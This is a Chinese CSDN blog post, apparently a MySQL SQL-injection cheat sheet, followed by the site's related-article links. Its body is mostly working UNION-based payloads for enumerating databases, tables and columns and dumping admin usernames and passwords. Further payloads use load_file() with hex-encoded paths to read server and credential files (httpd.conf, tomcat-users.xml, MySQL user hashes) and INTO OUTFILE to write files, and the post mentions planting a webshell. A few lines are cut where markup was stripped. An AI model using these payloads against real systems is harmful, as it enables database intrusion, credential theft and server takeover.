mysql 注入语句_MYSQL注入语句

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量1.1k 收藏 1
点赞数
文章标签: mysql 注入语句
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33007509/article/details/113159347
版权

一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的

方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限。

MYsql 5.X以上版本的注入查询主要基于information_schem

1.UNION 注入 (联合查询注入) ≥ MySQL 5      information_schema  (信息数据库),其中保存着关于 MySQL 服务器所维护的所有其它数据库的 信息, 如数据库名、表名、数据类型、访问权限等。

显示数据库信息字段数查找

id=1/**/Order/**/By/**/10/**/--        正常则字段数>10 id=1/**/Order/**/By/**/12/**/--        错误则字段数<12

枚举数据库名

And 1=2 Union Select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 (注意字段数)

从 0 个库开始,显示数到第 1 个库

当前数据库名 and 1=2 union select 1,database()--

查表名

and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7068707a72--

table_schema=后面是库名的 16 进制(上面爆出的库名转换16进制)

查字段名

and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where table_name=0x61646d696e and table_schema=0x7068707a72 limit 1,1--

0x61646d696e    表名 admin

0x7068707a72    库名 phpzr(上面爆出的库名,表名)

查字段内容

and 1=2 union select 1,concat(id,0x3c62723e,username,0x3c62723e,password) from admin--

从 admin 表中查询字段名为 id、username、password 值的记录(username,password都是上一步爆出的字段名)

admin是上面爆出的表名

0x3c62723e 表示

、、、、、、、、、、、、、、、、、、、、、、、、、、、

一.查看 MYSQL 基本信息(库名,版本,用户)

and 1=2 union select 1,database(),version(),user()--

关于找不到 ROOT 密码的爆破: 通过 LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用户的 HASH 散列,之后用 CAIN 爆 破….

current_user() 当前用户名

version()     MySQL 数据库版本

system_user()      系统用户名

user()          用户名

session_user()     连接数据库的用户名

database()     数据库名

load_file()        MySQL 读文件(需 root 权限)

@@datadir    MySQL 库文件路径

@@version_compile_os    操作系统

Substring()函数 substring()是字符串读取(可解决字段长度限制导致信息显示不全) id=1/**/And/**/1=2/**/Union/**/Select/**/1,Substring(Load_file(0x633a2f626f6f742e696e69),1)/* */

Replace()函数 Replace()是字符串替换函数,替换指定的字符串内容,返回替换后全部数据。有时通过 load_file() 读文件内容无法正常显示,例如用 Replace()替换掉其中编码为 hex 的“

写入 webshell 一:无法获得 web 目录 ① 用 uploadpic.php 中 getimagesize()函数的小 bug,先在后台添加上传类型 text/asa,然后到前台传 图片的地方传个 asa 文件,这个函数无法读取起大小,暴出错误时泄露了绝对路径

二、入侵数据库操作系统 读写文件 前置条件

1:读文件 load_file()函数要数据库 root 账户权限.

2:写文件 magic_quotes_gpc 必须为 off.

数据库账户权限判断 And Ord(Mid(User(),1,1))=114

正常是 root

①  读文件 Hex (Recommend) http://127.0.0.1/web_vunerability/mysql.php?id=1/**/And/**/1=2/**/Union/**/Select/**/1,Replac e(Load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),0x3c,0x20)/**/

/etc/httpd/conf/httpd.conf            //Red Hat 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66

c:\windows\system32\inetsrv\MetaBase.xml        //NT 5.2 0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c

c:\Program Files\Tomcat\conf\tomcat-users.xml      //Tomcat For Windows 0x433a5c50726f6772616d2046696c65735c546f6d6361745c636f6e665c746f6d6361742d7573657273 2e786d6c

Char And/**/1=2/**/Union/**/Select/**/1,Load_file(char(99,58,92,98,111,111,116,46,105,110,105))/**/

无编码 And/**/1=2/**/Union/**/Select/**/1,load_file('c:/boot.ini')/**/

②  写文件 and 1=2 union all select 'fuck',2 into outfile 'd:/fuck2.txt'#

山蓝蓝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入语句 爆表_mysql注入语句
weixin_42361635的博客
02-04 830
一、sql注入语句爆破所有数据库:(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:(select ...
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
Mysql注入
天天学安全专属博客
10-28 4224
mysql注入,包括union注入,数据库跨库注入,常见的注入绕过方法和数据库文件读写
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 739
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
SQL注入MYSQL基础语句(持续更新)附图
weixin_44431280的博客
03-19 5568
SQL注入mysql基础语句 简介:常见的Web安全漏洞中,SQL注入利用和危害极大,通过其可以直接获取数据表的内容,从而获得Web站点的账号和密码,在学习SQL注入时,我们需要先对常见的数据库基础进行学习和了解。 MYSQL基础语句 一:数据库操作 1,在当前数据库管理系统中创建/删除数据库:create/drop dadabase websec; 2,查看当前数据库管理系统下所有数据库:show databases; 3,使用(进入)操作的数据库,use websec; 二:数据表操作 1,创建数据
MongoDB Shell使用
u013310037的博客
10-09 755
MongoDB Compass的启动: mongodb-compass 单击MongoDB Compass下方的 MongoSH Beta,从而启动MongoDB Shell:
Mysql注入_基础
ccz4854的博客
04-27 1408
Mysql注入类型 union 联合查询 布尔盲注 时间盲注 显错注入 堆叠注入 宽字节注入 (只存在PHP) Mysql各类型注入语句 1.union 联合查询(sql查询语句),存在mysql的版本问题 下方是5.0之后版本的利用方式 5.0之后的版本存在 information_schema 表 :information_schema 是 一个虚拟数据库 information_schema数据库类似与“数据字典”,提供了访问数据库元数据的方式,即数据的数据。 如数据库名或表名,列类型,访问权
MySQL.rar_mysql语句
09-21
本文将详细解析《MySQL语法语句大全》文档中的关键知识点,帮助你深入理解和掌握MySQL的核心功能。 一、SQL基础 SQL,全称Structured Query Language,是用于管理和操作数据库的语言。在MySQL中,SQL语句主要包括...
mysql练习注入语句
01-21
MySQL练习注入语句 MySQL是当今最流行的关系数据库管理系统之一,在Web应用程序中广泛应用。然而,MySQL也存在一些安全风险,例如SQL注入攻击。这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、...
mysql数据库语句代码实例.rar_mysql数据库语句_图书管理mysql_增删查改基本sql语句_存储过程_数据库和代码
09-15
本压缩包中的资源提供了关于MySQL数据库语句的实践代码实例,涵盖了数据库操作的基础知识,包括增(INSERT)、删(DELETE)、查(SELECT)和改(UPDATE),以及存储过程和多表连接的使用。以下是对这些知识点的详细...
MYSQL语句写入.zip_MYSQL语句写入
09-21
本压缩包文件“MYSQL语句写入.zip”包含了关于如何在MySQL中进行基本的写入操作的示例程序,特别是文件“MYSQL语句写入.vi”,这可能是一个Visual Interface(VI)编程环境下的代码片段,用于演示如何执行MySQL语句...
mysql注入语句解释,MYSQL注入语句实用精解
weixin_34470566的博客
03-24 503
MYSQL注入语句实用精解只讲字符型。order by XXUnion select .....1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version...
详细|通过mysql学习sql注入
st3pby的博客
06-08 952
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
mysql连接和断开服务器
weixin_46540009的博客
04-04 375
mysql连接和断开服务器 启动mysql服务: sudo service mysql start 停止mysql服务: sudo service mysql stop 要连接到服务器,我们通常需要提供MySQL的用户名来触发mysql,很可能,还需要密码。如果你的服务器运行在一个其他的机器上,你还需要指定主机名。联系管理员来找到连接参数(例如主机名,用户名和密码),当你知道了正确的参数后,你可以像下面那样连接: shell> mysql -h host -u user -p Enter pass
mysql注入之盲注语句汇总
sirius的博客
08-28 3621
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
[理论-学习]Web安全-SQL注入-基础04
3hex的博客
08-17 146
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: 以Sqli-labs中的less11,12为实验环境。 一、实验(POST类型的基于报错的字符型注入-单引号) 1. 使用POST方式传入参数 输入的uname和passwd能影响页面显示。 2. 测试语句能否报错 使uname=1‘,能报错。 可以看出passwod使单引号闭合。但是报错的语句很难看出uname用什么闭合。 使uname=1’“,爆出un.
MySQL 手工注入常用语句
热门推荐
龙哥盟
03-02 4万+
判断是否存在SQL注入' and 1=1 and 1=2暴字段长度Order by 数字匹配字段and 1=1 union select 1,2,..,n暴字段位置and 1=2 union select 1,2,..,n利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select ve
SQL注入Mysql注入
qq_27862405的博客
05-24 954
必要知识点: 在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。 数据库中符号“.”代表下一级,如adb.user表示adb数据库下的user表名 Information_schema.tables:记录所有表名信息的表 Information_schema.columns:记录所有列名信息的表 Information_schema.sch
sql注入--基本注入语句学习笔记
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
mysql建表 sql语句_mysql
07-15
总结起来,MySQL建表的过程包括选择数据库、使用CREATE TABLE语句创建表、使用ALTER TABLE语句修改表结构(可选)、使用INSERT INTO语句插入数据,以及使用SELECT语句检索数据。 ### 回答3: MySQL是一种广泛使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值